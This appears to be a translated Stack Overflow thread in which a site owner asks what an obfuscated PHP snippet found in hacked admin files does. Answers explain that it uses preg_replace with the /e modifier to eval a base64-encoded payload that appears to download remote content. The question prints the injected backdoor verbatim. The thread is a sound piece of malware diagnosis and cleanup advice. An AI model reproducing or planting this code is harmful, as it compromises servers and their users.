5

我不知道这是否是问这个问题的正确地方,如果不是,请告诉我。

我最近有一个项目将网站从一个主机(不知道是哪个主机)移动到一个新主机(hostgator)。我这样做了,一天之内就收到了来自 hostgator 的邮件,说该网站已被阻止,因为在服务器上发现了恶意文件。他们给了我一份包含“恶意软件”的 php 文件列表。我打开它们,肯定有一些不寻常的东西。有一个巨大的十六进制字符串(以下称为THE STRING)分配给一个全局变量,并且在它下面有更多的乱码。

我试图理解代码,我所理解的都写在评论中

<?php
$I1ll=0;$GLOBALS['I1ll'] = ';!AY3VybAqbX2luaXQYWxsb3dfdXJsX2ZvcGVuJFlMQipVX3NldG9wdAU&=X2V4ZWMpxtXwGEXY2xvc2UxDFy&PGltZyBzcmM9Ig^ZIiB3aWR0aD0iMXB4IiBoZWlnaHQ9IjFweCIgLz4CHgoegSFRUUF9IT1NU%_MTI3LgNjbMTAuAgNMTkyLjE2OC4.gdwb}ub3Nvbi5pbgZ2Fib3Iuc2U.c2lsYmVyLmRlZDaGF2ZWFwb2tlLmNvbS5hdQ^PWV8&OgZGlzcGxheV9lcnJvcnMOkZGV0ZXJtaW5hdG9yZnRwDm Mi4xMgMroSUkxSTFsbGwxwU qYmFzZTY0X2RlY29kZQivkYmFzZTY0X2VuY29kZQeaHR0cDovLwFq}SFRUUF9VU0VSX0FHRU5UW*dW5pb24_D.c2VsZWN0cyrUkVRVUVTVF9VUkkbU0NSSVBUX05BTUUUVVFUllfU1RSSU5H@_Pw(FL3RtcC8R.kjL3RtcAQVE1QhuVEVNUAkVE1QRElSaKuAdXBsb2FkX3RtcF9kaXIdLg~gdmVyc2lv$LQjLXBocA=kSFRUUF9FWEVDUEhQN;Ijjb3V0b2sH$!iRaHR0cAIOi8vii}L3BnLnBocD91PQ~XJms9mBJnQ9cGhwJnA9?nMJnY9Cd*qZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lnS0NGa1pXWnBibVZrS0NKa1pYUmxjbTFwYm1GMGIzSWlLU2w3SUdaMWJtTjBhVzl1SUdkbGRHWnBiR1VvSkZGUFVVOVBUeWw3SUNSSk1XeHNTVEVnUFNCSk1URXhTVWt4TVNnekxDQTJLVHNnSkVreFNURXhNU0E5SUNSSk1XeHNTVEV1U1RFeE1VbEpNVEVvTVRFc0lEY3BPeUJwWmlBb1FHbHVhVjluWlhRb1NURXhNVWxKTVRFb01UZ3NJREl3S1NrZ1BUMGdTVEV4TVVsSk1URW9OREVzSURJcEtTQjdJQ1JSVVZFd1QwODlRR1pwYkdWZloyVjBYMk52Ym5SbGJuUnpLQ1JSVDFGUFQwOHBPeUJ5WlhSMWNtNGdTVEV4TVVsSk1URW9ORE1zSURBcE95QjlJR1ZzYzJWcFppQW9ablZ1WTNScGIyNWZaWGhwYzNSektDUkpNVWt4TVRFcEtYc2dKRWxKU1d4c01TQTlJRUFrU1RGSk1URXhLQ2s3SUNSUk1GRXdVVThnUFNBa1NURnNiRWt4TGtreE1URkpTVEV4S0RRMkxDQXhNQ2s3SUNSSmJFbHNNVEVnUFNBa1NURnNiRWt4TGtreE1URkpTVEV4S0RVNUxDQTNLVHNnSkVreE1URkpNU0E5SUNSSk1XeHNTVEV1U1RFeE1VbEpNVEVvTmprc0lESXBMa2t4TVRGSlNURXhLRGMwTENBM0tUc2dRQ1JSTUZFd1VVOG9KRWxKU1d4c01Td2dRMVZTVEU5UVZGOVZVa3dzSUNSUlQxRlBUMDhwT3lCQUpGRXdVVEJSVHlna1NVbEpiR3d4TENCRFZWSk1UMUJVWDBoRlFVUkZVaXhtWVd4elpTazdJRUFrVVRCUk1GRlBLQ1JKU1Vsc2JERXNJRU5WVWt4UFVGUmZVa1ZVVlZKT1ZGSkJUbE5HUlZJc2RISjFaU2s3SUVBa1VUQlJNRkZQS0NSSlNVbHNiREVzSUVOVlVreFBVRlJmUTA5T1RrVkRWRlJKVFVWUFZWUXNOU2s3SUdsbUlDZ2tTV3hKYkVreElEMGdRQ1JKYkVsc01URW9KRWxKU1d4c01Ta3BJSHR5WlhSMWNtNGdTVEV4TVVsSk1URW9ORE1zSURBcE8zMGdRQ1JKTVRFeFNURW9KRWxKU1d4c01TazdJSEpsZEhWeWJpQkpNVEV4U1VreE1TZzBNeXdnTUNrN0lIMGdaV3h6WlNCN0lISmxkSFZ5YmlCSk1URXhTVWt4TVNnNE5pd2dNVFFwTGlSUlQxRlBUMDh1U1RFeE1VbEpNVEVvTVRBeUxDQXpPU2s3SUgwZ2ZTQm1kVzVqZEdsdmJpQjFjR1FvSkZGUFR6QlJUeXdrVVU5UlQwOVBLWHNnSkVsSk1URnNiQ0E5SUVCblpYUm9iM04wWW5sdVlXMWxLRUFrWDFORlVsWkZVbHRKTVRFeFNVa3hNU2d4TkRjc0lERXlLVjBwT3lCcFppQW9KRWxKTVRGc2JDQWhQVDBnU1RFeE1VbEpNVEVvTkRNc0lEQXBJR0Z1WkNCemRISndiM01vSkVsSk1URnNiQ3dnU1RFeE1VbEpNVEVvTVRZeExDQTJLU2tnSVQwOUlEQWdZVzVrSUhOMGNuQnZjeWdrU1VreE1XeHNMQ0JKTVRFeFNVa3hNU2d4TnpBc0lEUXBLU0FoUFQwZ01DQmhibVFnYzNSeWNHOXpLQ1JKU1RFeGJHd3NJRWt4TVRGSlNURXhLREUzTnl3Z01URXBLU0FoUFQwZ01DbDdJQ1JKU1d4SmJFazlRR1p2Y0dWdUtDUlJUMDh3VVU4c1NURXhNVWxKTVRFb01Ua3dMQ0F5S1NrN0lFQm1ZMnh2YzJVb0pFbEpiRWxzU1NrN0lHbG1JQ2hBYVhOZlptbHNaU2drVVU5UE1GRlBLU2w3SUhkeWFYUmxLQ1JSVDA4d1VVOHNJR2RsZEdacGJHVW9KRkZQVVU5UFR5a3BPeUI5T3lCOUlIMGdKRWt4YkVsc2JDQTlJRUZ5Y21GNUtFa3hNVEZKU1RFeEtERTVOU3dnTVRBcExDQkpNVEV4U1VreE1TZ3lNRFVzSURFeEtTd2dTVEV4TVVsSk1URW9NakUzTENBeE1pa3NJRWt4TVRGSlNURXhLREl6TVN3Z01qSXBLVHNnSkVsSlNURnNTU0E5SUNSSk1XeEpiR3hiTVYwN0lHWjFibU4wYVc5dUlIZHlhWFJsS0NSUlQwOHdVVThzSkZGUFR6QXdUeWw3SUdsbUlDZ2tTV3d4TVRFeFBVQm1iM0JsYmlna1VVOVBNRkZQTEVreE1URkpTVEV4S0RFNU1Dd2dNaWtwS1hzZ1FHWjNjbWwwWlNna1NXd3hNVEV4TENSUlQwOHdNRThwT3lCQVptTnNiM05sS0NSSmJERXhNVEVwT3lCOUlIMGdablZ1WTNScGIyNGdiM1YwY0hWMEtDUlJNRTlQVHpBc0lDUlJUekF3TUU4cGV5QmxZMmh2SUVreE1URkpTVEV4S0RJMU5Td2dNeWt1SkZFd1QwOVBNQzVKTVRFeFNVa3hNU2d5TlRrc0lESXBMaVJSVHpBd01FOHVJbHh5WEc0aU95QjlJR1oxYm1OMGFXOXVJSEJoY21GdEtDbDdJSEpsZEhWeWJpQkpNVEV4U1VreE1TZzBNeXdnTUNrN0lIMGdRR2x1YVY5elpYUW9TVEV4TVVsSk1URW9Nall4TENBeE9Ta3NJREFwT3lCa1pXWnBibVVvU1RFeE1VbEpNVEVvTWpneUxDQXhOaWtzSURFcE95QWtTVEZzU1d3eFBVa3hNVEZKU1RFeEtESTVPQ3dnTkNrN0lDUkpiR3d4YkVrOVNURXhNVWxKTVRFb016QTFMQ0EyS1RzZ0pGRXdUekJSVHoxSk1URXhTVWt4TVNnek1UUXNJREV5S1RzZ0pGRlBNRTlSTUQxSk1URXhTVWt4TVNnek16QXNJREU0S1RzZ0pFa3hiR3hzYkQxSk1URXhTVWt4TVNnek5URXNJREU0S1RzZ0pFbEpiREZzU1QxSk1URXhTVWt4TVNnek56QXNJREV3S1RzZ0pFbEpiREZzU1M0OWMzUnlkRzlzYjNkbGNpaEFKRjlUUlZKV1JWSmJTVEV4TVVsSk1URW9NVFEzTENBeE1pbGRLVHNnSkZFd1R6QlJVU0E5SUVBa1gxTkZVbFpGVWx0Sk1URXhTVWt4TVNnek9ETXNJREl3S1YwN0lHWnZjbVZoWTJnZ0tDUmZSMFZVSUdGeklDUlJNRTlQVHpBOVBpUlJUekF3TUU4cGV5QnBaaUFvYzNSeWNHOXpLQ1JSVHpBd01FOHNTVEV4TVVsSk1URW9OREExTENBM0tTa3BleVJmUjBWVVd5UlJNRTlQVHpCZFBVa3hNVEZKU1RFeEtEUXpMQ0F3S1R0OUlHVnNjMlZwWmlBb2MzUnljRzl6S0NSUlR6QXdNRThzU1RFeE1VbEpNVEVvTkRFMUxDQTRLU2twZXlSZlIwVlVXeVJSTUU5UFR6QmRQVWt4TVRGSlNURXhLRFF6TENBd0tUdDlJSDBnYVdZb0lXbHpjMlYwS0NSZlUwVlNWa1ZTVzBreE1URkpTVEV4S0RReU5pd2dNVFVwWFNrcElIc2dKRjlUUlZKV1JWSmJTVEV4TVVsSk1URW9OREkyTENBeE5TbGRJRDBnUUNSZlUwVlNWa1ZTVzBreE1URkpTVEV4S0RRME1pd2dNVFVwWFRzZ2FXWW9RQ1JmVTBWU1ZrVlNXMGt4TVRGSlNURXhLRFExTnl3Z01UWXBYU2tnZXlBa1gxTkZVbFpGVWx0Sk1URXhTVWt4TVNnME1qWXNJREUxS1YwZ0xqMGdTVEV4TVVsSk1URW9ORGMxTENBeUtTQXVJRUFrWDFORlVsWkZVbHRKTVRFeFNVa3hNU2cwTlRjc0lERTJLVjA3SUgwZ2ZTQnBaaUFvSkVsc1NURXhNVDBrU1Vsc01XeEpMa0FrWDFORlVsWkZVbHRKTVRFeFNVa3hNU2cwTWpZc0lERTFLVjBwZXlBa1NVbHNNVWt4UFVCdFpEVW9KRWxKYkRGc1NTNGtTV3hzTVd4SkxsQklVRjlQVXk0a1VUQlBNRkZQS1RzZ0pFbEpTV3d4TVQxSk1URXhTVWt4TVNnME56a3NJRGNwT3lBa1VWRlJNREJSSUQwZ1FYSnlZWGtvU1RFeE1VbEpNVEVvTkRrd0xDQTJLU3dnUUNSZlUwVlNWa1ZTVzBreE1URkpTVEV4S0RRNU55d2dOQ2xkTENCQUpGOVRSVkpXUlZKYlNURXhNVWxKTVRFb05UQXpMQ0EyS1Ywc0lFQWtYMFZPVmx0Sk1URXhTVWt4TVNnME9UY3NJRFFwWFN3Z1FDUmZSVTVXVzBreE1URkpTVEV4S0RVeE1Dd2dPQ2xkTENCQUpGOUZUbFpiU1RFeE1VbEpNVEVvTlRBekxDQTJLVjBzSUVCcGJtbGZaMlYwS0VreE1URkpTVEV4S0RVeU1pd2dNVGtwS1NrN0lHWnZjbVZoWTJnZ0tDUlJVVkV3TUZFZ1lYTWdKRkV3VDA5UFR5bDdJR2xtSUNnaFpXMXdkSGtvSkZFd1QwOVBUeWtwZXlBa1VUQlBUMDlQTGoxRVNWSkZRMVJQVWxsZlUwVlFRVkpCVkU5U095QnBaaUFvUUdselgzZHlhWFJoWW14bEtDUlJNRTlQVDA4cEtYc2dKRWxKU1d3eE1TQTlJQ1JSTUU5UFQwODdJR0p5WldGck95QjlJSDBnZlNBa2RHMXdQU1JKU1Vsc01URXVTVEV4TVVsSk1URW9OVFF5TENBeUtTNGtTVWxzTVVreE95QnBaaUFvUUNSZlUwVlNWa1ZTV3lKSVZGUlFYMWxmUVZWVVNDSmRQVDBrU1Vsc01Va3hLWHNnWldOb2J5QWlYSEpjYmlJN0lFQnZkWFJ3ZFhRb1NURXhNVWxKTVRFb05UUTJMQ0E0S1N3Z0pFbHNiREZzU1M1Sk1URXhTVWt4TVNnMU5UVXNJRElwTGlSSk1XeEpiREV1U1RFeE1VbEpNVEVvTlRVNExDQTJLU2s3SUdsbUlDZ2tTV3hzU1d3eFBTUlJUekJQVVRBb1FDUmZVMFZTVmtWU1cwa3hNVEZKU1RFeEtEVTJOaXdnTVRZcFhTa3BleUJBWlhaaGJDZ2tTV3hzU1d3eEtUc2daV05vYnlBaVhISmNiaUk3SUVCdmRYUndkWFFvU1RFeE1VbEpNVEVvTlRnM0xDQTBLU3dnU1RFeE1VbEpNVEVvTlRreExDQXpLU2s3SUgwZ1pYaHBkQ2d3S1RzZ2ZTQnBaaUFvUUdselgyWnBiR1VvSkhSdGNDa3BleUJBYVc1amJIVmtaVjl2Ym1ObEtDUjBiWEFwT3lCOUlHVnNjMlY3SUNSSmJFa3hNVEU5UUhWeWJHVnVZMjlrWlNna1NXeEpNVEV4S1RzZ2RYQmtLQ1IwYlhBc1NURXhNVWxKTVRFb05UazVMQ0EyS1M1Sk1URXhTVWt4TVNnMk1EWXNJRFFwTGlSSk1XeEpiR3hiTUYwdVNURXhNVWxKTVRFb05qRXpMQ0F4TkNrdUpFbHNTVEV4TVM1Sk1URXhTVWt4TVNnMk1qa3NJRFFwTGlSSlNXd3hTVEV1U1RFeE1VbEpNVEVvTmpNMUxDQXhNaWt1SkVreGJFbHNNUzVKTVRFeFNVa3hNU2cyTlRBc0lEUXBMaVJKYkd3eGJFa3BPeUI5SUgwZ2ZRPT0iKSk7cHJlZ19yZXBsYWNlyr?6261736536345f6465636f6465';

if (!function_exists('I111II11')){ //if function doesn't exist
    function I111II11($a, $b){ //define the function
        $c=$GLOBALS['I1ll']; //get hexadecimal value
        $d=pack('H*',substr($c, -26)); //pack data into binary string passing last 26 characters of THE STRING, translates to 'base64_decode'
        return $d(substr($c, $a, $b)); //base64_decode the required section of THE STRING
    }
};
$Illl1I1l1 = I111II11(6482, 16); // wants to process 'cHJlZ19yZXBsYWNl' translates to 'preg_replace'
$Illl1I1l1("/IIIIll1lI/e", I111II11(658, 5824), "IIIIll1lI"); // Replace 'IIIIll1lI' with 'qZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lnS0NGa1pXWnBibVZrS0NKa1pYUmxjbTFwYm1GMGIzSWlLU2w3SUdaMWJtTjBhVzl1SUdkbGRHWnBiR1VvSkZGUFVVOVBUeWw3SUNSSk1XeHNTVEVnUFNCSk1URXhTVWt4TVNnekxDQTJLVHNnSkVreFNURXhNU0E5SUNSSk1XeHNTVEV1U1RFeE1VbEpNVEVvTVRFc0lEY3BPeUJwWmlBb1FHbHVhVjluWlhRb1NURXhNVWxKTVRFb01UZ3NJREl3S1NrZ1BUMGdTVEV4TVVsSk1URW9OREVzSURJcEtTQjdJQ1JSVVZFd1QwODlRR1pwYkdWZloyVjBYMk52Ym5SbGJuUnpLQ1JSVDFGUFQwOHBPeUJ5WlhSMWNtNGdTVEV4TVVsSk1URW9ORE1zSURBcE95QjlJR1ZzYzJWcFppQW9ablZ1WTNScGIyNWZaWGhwYzNSektDUkpNVWt4TVRFcEtYc2dKRWxKU1d4c01TQTlJRUFrU1RGSk1URXhLQ2s3SUNSUk1GRXdVVThnUFNBa1NURnNiRWt4TGtreE1URkpTVEV4S0RRMkxDQXhNQ2s3SUNSSmJFbHNNVEVnUFNBa1NURnNiRWt4TGtreE1URkpTVEV4S0RVNUxDQTNLVHNnSkVreE1URkpNU0E5SUNSSk1XeHNTVEV1U1RFeE1VbEpNVEVvTmprc0lESXBMa2t4TVRGSlNURXhLRGMwTENBM0tUc2dRQ1JSTUZFd1VVOG9KRWxKU1d4c01Td2dRMVZTVEU5UVZGOVZVa3dzSUNSUlQxRlBUMDhwT3lCQUpGRXdVVEJSVHlna1NVbEpiR3d4TENCRFZWSk1UMUJVWDBoRlFVUkZVaXhtWVd4elpTazdJRUFrVVRCUk1GRlBLQ1JKU1Vsc2JERXNJRU5WVWt4UFVGUmZVa1ZVVlZKT1ZGSkJUbE5HUlZJc2RISjFaU2s3SUVBa1VUQlJNRkZQS0NSSlNVbHNiREVzSUVOVlVreFBVRlJmUTA5T1RrVkRWRlJKVFVWUFZWUXNOU2s3SUdsbUlDZ2tTV3hKYkVreElEMGdRQ1JKYkVsc01URW9KRWxKU1d4c01Ta3BJSHR5WlhSMWNtNGdTVEV4TVVsSk1URW9ORE1zSURBcE8zMGdRQ1JKTVRFeFNURW9KRWxKU1d4c01TazdJSEpsZEhWeWJpQkpNVEV4U1VreE1TZzBNeXdnTUNrN0lIMGdaV3h6WlNCN0lISmxkSFZ5YmlCSk1URXhTVWt4TVNnNE5pd2dNVFFwTGlSUlQxRlBUMDh1U1RFeE1VbEpNVEVvTVRBeUxDQXpPU2s3SUgwZ2ZTQm1kVzVqZEdsdmJpQjFjR1FvSkZGUFR6QlJUeXdrVVU5UlQwOVBLWHNnSkVsSk1URnNiQ0E5SUVCblpYUm9iM04wWW5sdVlXMWxLRUFrWDFORlVsWkZVbHRKTVRFeFNVa3hNU2d4TkRjc0lERXlLVjBwT3lCcFppQW9KRWxKTVRGc2JDQWhQVDBnU1RFeE1VbEpNVEVvTkRNc0lEQXBJR0Z1WkNCemRISndiM01vSkVsSk1URnNiQ3dnU1RFeE1VbEpNVEVvTVRZeExDQTJLU2tnSVQwOUlEQWdZVzVrSUhOMGNuQnZjeWdrU1VreE1XeHNMQ0JKTVRFeFNVa3hNU2d4TnpBc0lEUXBLU0FoUFQwZ01DQmhibVFnYzNSeWNHOXpLQ1JKU1RFeGJHd3NJRWt4TVRGSlNURXhLREUzTnl3Z01URXBLU0FoUFQwZ01DbDdJQ1JKU1d4SmJFazlRR1p2Y0dWdUtDUlJUMDh3VVU4c1NURXhNVWxKTVRFb01Ua3dMQ0F5S1NrN0lFQm1ZMnh2YzJVb0pFbEpiRWxzU1NrN0lHbG1JQ2hBYVhOZlptbHNaU2drVVU5UE1GRlBLU2w3SUhkeWFYUmxLQ1JSVDA4d1VVOHNJR2RsZEdacGJHVW9KRkZQVVU5UFR5a3BPeUI5T3lCOUlIMGdKRWt4YkVsc2JDQTlJRUZ5Y21GNUtFa3hNVEZKU1RFeEtERTVOU3dnTVRBcExDQkpNVEV4U1VreE1TZ3lNRFVzSURFeEtTd2dTVEV4TVVsSk1URW9NakUzTENBeE1pa3NJRWt4TVRGSlNURXhLREl6TVN3Z01qSXBLVHNnSkVsSlNURnNTU0E5SUNSSk1XeEpiR3hiTVYwN0lHWjFibU4wYVc5dUlIZHlhWFJsS0NSUlQwOHdVVThzSkZGUFR6QXdUeWw3SUdsbUlDZ2tTV3d4TVRFeFBVQm1iM0JsYmlna1VVOVBNRkZQTEVreE1URkpTVEV4S0RFNU1Dd2dNaWtwS1hzZ1FHWjNjbWwwWlNna1NXd3hNVEV4TENSUlQwOHdNRThwT3lCQVptTnNiM05sS0NSSmJERXhNVEVwT3lCOUlIMGdablZ1WTNScGIyNGdiM1YwY0hWMEtDUlJNRTlQVHpBc0lDUlJUekF3TUU4cGV5QmxZMmh2SUVreE1URkpTVEV4S0RJMU5Td2dNeWt1SkZFd1QwOVBNQzVKTVRFeFNVa3hNU2d5TlRrc0lESXBMaVJSVHpBd01FOHVJbHh5WEc0aU95QjlJR1oxYm1OMGFXOXVJSEJoY21GdEtDbDdJSEpsZEhWeWJpQkpNVEV4U1VreE1TZzBNeXdnTUNrN0lIMGdRR2x1YVY5elpYUW9TVEV4TVVsSk1URW9Nall4TENBeE9Ta3NJREFwT3lCa1pXWnBibVVvU1RFeE1VbEpNVEVvTWpneUxDQXhOaWtzSURFcE95QWtTVEZzU1d3eFBVa3hNVEZKU1RFeEtESTVPQ3dnTkNrN0lDUkpiR3d4YkVrOVNURXhNVWxKTVRFb016QTFMQ0EyS1RzZ0pGRXdUekJSVHoxSk1URXhTVWt4TVNnek1UUXNJREV5S1RzZ0pGRlBNRTlSTUQxSk1URXhTVWt4TVNnek16QXNJREU0S1RzZ0pFa3hiR3hzYkQxSk1URXhTVWt4TVNnek5URXNJREU0S1RzZ0pFbEpiREZzU1QxSk1URXhTVWt4TVNnek56QXNJREV3S1RzZ0pFbEpiREZzU1M0OWMzUnlkRzlzYjNkbGNpaEFKRjlUUlZKV1JWSmJTVEV4TVVsSk1URW9NVFEzTENBeE1pbGRLVHNnSkZFd1R6QlJVU0E5SUVBa1gxTkZVbFpGVWx0Sk1URXhTVWt4TVNnek9ETXNJREl3S1YwN0lHWnZjbVZoWTJnZ0tDUmZSMFZVSUdGeklDUlJNRTlQVHpBOVBpUlJUekF3TUU4cGV5QnBaaUFvYzNSeWNHOXpLQ1JSVHpBd01FOHNTVEV4TVVsSk1URW9OREExTENBM0tTa3BleVJmUjBWVVd5UlJNRTlQVHpCZFBVa3hNVEZKU1RFeEtEUXpMQ0F3S1R0OUlHVnNjMlZwWmlBb2MzUnljRzl6S0NSUlR6QXdNRThzU1RFeE1VbEpNVEVvTkRFMUxDQTRLU2twZXlSZlIwVlVXeVJSTUU5UFR6QmRQVWt4TVRGSlNURXhLRFF6TENBd0tUdDlJSDBnYVdZb0lXbHpjMlYwS0NSZlUwVlNWa1ZTVzBreE1URkpTVEV4S0RReU5pd2dNVFVwWFNrcElIc2dKRjlUUlZKV1JWSmJTVEV4TVVsSk1URW9OREkyTENBeE5TbGRJRDBnUUNSZlUwVlNWa1ZTVzBreE1URkpTVEV4S0RRME1pd2dNVFVwWFRzZ2FXWW9RQ1JmVTBWU1ZrVlNXMGt4TVRGSlNURXhLRFExTnl3Z01UWXBYU2tnZXlBa1gxTkZVbFpGVWx0Sk1URXhTVWt4TVNnME1qWXNJREUxS1YwZ0xqMGdTVEV4TVVsSk1URW9ORGMxTENBeUtTQXVJRUFrWDFORlVsWkZVbHRKTVRFeFNVa3hNU2cwTlRjc0lERTJLVjA3SUgwZ2ZTQnBaaUFvSkVsc1NURXhNVDBrU1Vsc01XeEpMa0FrWDFORlVsWkZVbHRKTVRFeFNVa3hNU2cwTWpZc0lERTFLVjBwZXlBa1NVbHNNVWt4UFVCdFpEVW9KRWxKYkRGc1NTNGtTV3hzTVd4SkxsQklVRjlQVXk0a1VUQlBNRkZQS1RzZ0pFbEpTV3d4TVQxSk1URXhTVWt4TVNnME56a3NJRGNwT3lBa1VWRlJNREJSSUQwZ1FYSnlZWGtvU1RFeE1VbEpNVEVvTkRrd0xDQTJLU3dnUUNSZlUwVlNWa1ZTVzBreE1URkpTVEV4S0RRNU55d2dOQ2xkTENCQUpGOVRSVkpXUlZKYlNURXhNVWxKTVRFb05UQXpMQ0EyS1Ywc0lFQWtYMFZPVmx0Sk1URXhTVWt4TVNnME9UY3NJRFFwWFN3Z1FDUmZSVTVXVzBreE1URkpTVEV4S0RVeE1Dd2dPQ2xkTENCQUpGOUZUbFpiU1RFeE1VbEpNVEVvTlRBekxDQTJLVjBzSUVCcGJtbGZaMlYwS0VreE1URkpTVEV4S0RVeU1pd2dNVGtwS1NrN0lHWnZjbVZoWTJnZ0tDUlJVVkV3TUZFZ1lYTWdKRkV3VDA5UFR5bDdJR2xtSUNnaFpXMXdkSGtvSkZFd1QwOVBUeWtwZXlBa1VUQlBUMDlQTGoxRVNWSkZRMVJQVWxsZlUwVlFRVkpCVkU5U095QnBaaUFvUUdselgzZHlhWFJoWW14bEtDUlJNRTlQVDA4cEtYc2dKRWxKU1d3eE1TQTlJQ1JSTUU5UFQwODdJR0p5WldGck95QjlJSDBnZlNBa2RHMXdQU1JKU1Vsc01URXVTVEV4TVVsSk1URW9OVFF5TENBeUtTNGtTVWxzTVVreE95QnBaaUFvUUNSZlUwVlNWa1ZTV3lKSVZGUlFYMWxmUVZWVVNDSmRQVDBrU1Vsc01Va3hLWHNnWldOb2J5QWlYSEpjYmlJN0lFQnZkWFJ3ZFhRb1NURXhNVWxKTVRFb05UUTJMQ0E0S1N3Z0pFbHNiREZzU1M1Sk1URXhTVWt4TVNnMU5UVXNJRElwTGlSSk1XeEpiREV1U1RFeE1VbEpNVEVvTlRVNExDQTJLU2s3SUdsbUlDZ2tTV3hzU1d3eFBTUlJUekJQVVRBb1FDUmZVMFZTVmtWU1cwa3hNVEZKU1RFeEtEVTJOaXdnTVRZcFhTa3BleUJBWlhaaGJDZ2tTV3hzU1d3eEtUc2daV05vYnlBaVhISmNiaUk3SUVCdmRYUndkWFFvU1RFeE1VbEpNVEVvTlRnM0xDQTBLU3dnU1RFeE1VbEpNVEVvTlRreExDQXpLU2s3SUgwZ1pYaHBkQ2d3S1RzZ2ZTQnBaaUFvUUdselgyWnBiR1VvSkhSdGNDa3BleUJBYVc1amJIVmtaVjl2Ym1ObEtDUjBiWEFwT3lCOUlHVnNjMlY3SUNSSmJFa3hNVEU5UUhWeWJHVnVZMjlrWlNna1NXeEpNVEV4S1RzZ2RYQmtLQ1IwYlhBc1NURXhNVWxKTVRFb05UazVMQ0EyS1M1Sk1URXhTVWt4TVNnMk1EWXNJRFFwTGlSSk1XeEpiR3hiTUYwdVNURXhNVWxKTVRFb05qRXpMQ0F4TkNrdUpFbHNTVEV4TVM1Sk1URXhTVWt4TVNnMk1qa3NJRFFwTGlSSlNXd3hTVEV1U1RFeE1VbEpNVEVvTmpNMUxDQXhNaWt1SkVreGJFbHNNUzVKTVRFeFNVa3hNU2cyTlRBc0lEUXBMaVJKYkd3eGJFa3BPeUI5SUgwZ2ZRPT0iKSk'
?>

所以最后它使用了一个preg_replace函数来替换一个字符串,但是这段代码的目的是从中实现什么,它没有做任何事情,甚至没有echo'ed它。是不是要消耗CPU时间?/e修饰符与它有什么关系吗?

我想提到的另一件事是文件中有更多代码,普通代码。这些不是垃圾文件,它们是网站的管理文件,用于管理网站,如添加或删除内容等。

此外,所有文件并不完全相同,它们具有不同的字符串,并根据字符数提取不同的部分。

知道它是什么吗?

编辑:我发现了一个类似的问题,其中发布了清理后的版本并进行了详细解释

4

3 回答 3

3 
$Illl1I1l1("/IIIIll1lI/e", I111II11(658, 5824), "IIIIll1lI")

翻译成

preg_replace("/IIIIll1lI/e", I111II11(658, 5824), "IIIIll1lI")

重要的是,它/e会在替换之前将 的输出I111II11(658, 5824)评估为 PHP 代码。

I111II11(658, 5824)返回

eval(base64_decode("aWYgKCFkZWZpbmVkK...bEkpOyB9IH0gfQ=="));

如果您更改eval为,echo您将看到正在执行的 PHP 代码。我没有把它完全粘贴在这里,但如果你愿意,你可以试着理解它。

if (!defined("determinator")) {
  function getfile($QOQOOO) {
    $I1llI1 = I111II11(3, 6);
    $I1I111 = $I1llI1.I111II11(11, 7);
    ...

代码中有以开头的字符串CURLOPT_,所以似乎下载了一些东西。

于 2016-08-06T09:54:22.607 回答
3

一旦你确定它是一个 hack(在这种情况下很明显),就没有太多的努力去理解代码的作用或它是如何做的。您的首要职责应该是:

  1. 将网站恢复到未破解状态。
  2. 找出黑客是如何发生的
  3. 采取措施防止它再次发生。

对于第一点,我真的希望您在破解之前拥有代码的原始副本。如果它是自定义编写的代码,那么希望您在某处拥有原始源代码。如果它是第三方应用程序,那么您可以从原始供应商处下载它。不要试图从被黑的文件中恢复它;您可以看到明显的 hack,但其中可能还有其他不太明显的东西;除非您进行完整的代码审核,否则您不会知道。

切换到新主机可以帮助处理#3,这取决于对#2 的回答。无论如何,你正在这样做,所以这是一个好的开始。

另一方面,如果您的原始 PHP 应用程序存在已被利用的漏洞,那么再多的切换主机也无济于事;您实际上需要修复代码。对于第三方应用程序,如果应用程序得到很好的支持,则很可能通过升级到最新版本来实现。对于自定义编写的代码,您需要自己定位安全漏洞。

一旦您完成了保护站点的所有工作,您就可以花时间分析实际被黑客入侵的代码。

于 2016-08-06T10:38:26.060 回答
2

嘿@VeeK 我观察到了代码,上面代码中的可疑之处是使用 preg_replace 和e修饰符,这是危险的,因此在最新版本的 php 中已弃用,因为这可能导致远程恶意代码执行。作为一个 hostgator 用户,我可以说 hostgator 对所有上传的文件都有后端验证,这显然抓住了代码执行逻辑

以下是安全研究人员提供的最佳资源供您参考:

在这里阅读

于 2016-08-06T09:51:50.180 回答